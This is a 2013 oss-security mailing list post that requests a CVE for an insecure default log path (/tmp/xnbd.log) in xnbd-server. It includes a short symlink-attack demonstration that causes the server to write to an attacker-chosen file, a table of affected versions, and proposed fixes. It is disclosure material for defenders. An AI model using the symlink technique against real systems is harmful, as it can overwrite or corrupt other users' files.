oss-sec mailing list archives
CVE request: Insecure default log file path in xNBD
From: Sebastian Pipping <sebastian () pipping org>
Date: Wed, 06 Feb 2013 17:48:59 +0100
Hello oss-security! Target software =============== xNBD upstream https://bitbucket.org/hirofuchi/xnbd Official Debian packages http://packages.debian.org/sid/xnbd-server Description =========== xnbd-server (and xnbd-wrapper in some releases) use /tmp/xnbd.log for logging when parameter --daemonize (and no --logpath FILE) is given. The file is opened using flags O_WRONLY | O_CREAT | O_APPEND so there is a vulnerability against symlinks attacks. Demonstration ============= Here is an exploitation example: $ ln -s "${HOME}"/ATTACK_TARGET /tmp/xnbd.log $ touch DISK $ truncate --size=$((100*1024**2)) DISK $ /usr/sbin/xnbd-server --daemonize --target DISK xnbd-server(12462) msg: daemonize enabled xnbd-server(12462) msg: cmd target mode xnbd-server(12462) msg: disk DISK size 104857600 B (100 MB) xnbd-server(12462) msg: xnbd master initialization done xnbd-server(12462) msg: logfile /tmp/xnbd.log $ ls -l ~/ATTACK_TARGET -rw------- 1 user123 user123 653 Feb 1 16:41 \ /home/user123/ATTACK_TARGET Affected versions ================= The latest code in the upstream Mercurial repository is not affected since it does not use logging to /tmp/xnbd.log (or any default location) any more. ---------------------------------------------------------------------- Version Status ---------------------------------------------------------------------- 0.0.x not analyzed 0.1.0-pre VULNERABLE (xnbd-server only) 0.1.0-pre-hg20-e75b93a47722-2 VULNERABLE (xnbd-server and -wrapper) Mercurial tip not vulnerable ---------------------------------------------------------------------- Options for a fix ================= a) Use syslog with --daemonize and no default file location in general (i.e. what upstream did) b) Use /var/log/xnbd-server.log and /var/log/xnbd-wrapper.log for the hard-coded defaults c) Replace flag O_APPEND by O_EXCL (secure but reducing functionality)The attached patch applies approach (b) to version 0.1.0-pre-hg20-e75b93a47722.
Best, Sebastian
Attachment:
xnbd-0.1.0-pre-hg20-e75b93a47722-insecure-logging-location.patch
Description:
Current thread:
- CVE request: Insecure default log file path in xNBD Sebastian Pipping (Feb 06)
- Re: CVE request: Insecure default log file path in xNBD Kurt Seifried (Feb 06)